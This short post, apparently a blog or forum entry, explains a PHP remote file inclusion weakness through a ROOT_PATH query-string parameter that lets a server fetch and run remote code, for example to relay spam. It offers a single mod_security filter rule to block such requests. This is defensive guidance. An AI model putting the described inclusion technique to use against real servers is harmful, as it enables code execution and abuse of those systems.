George Hubka

In PHP there is a vulnerability involving the ROOT_PATH include. It bascially allows via poor coding and a well constructed querystring to pass a file to PHP from a remote server and execute the code. As an example the included file could be used to send spam or phishing email be routing it internally through your server via the PHP code.

One easy to deal with this vulnerability is to run modsecurity with a filtering option.

All One line
SecFilterSelective REQUEST_URI "root_path=(http|https|ftp)\:/"

for more information http://www.modsecurity.org/ is a great site with links to more examples of rules you can run to help account for bad programming and unpatched packages.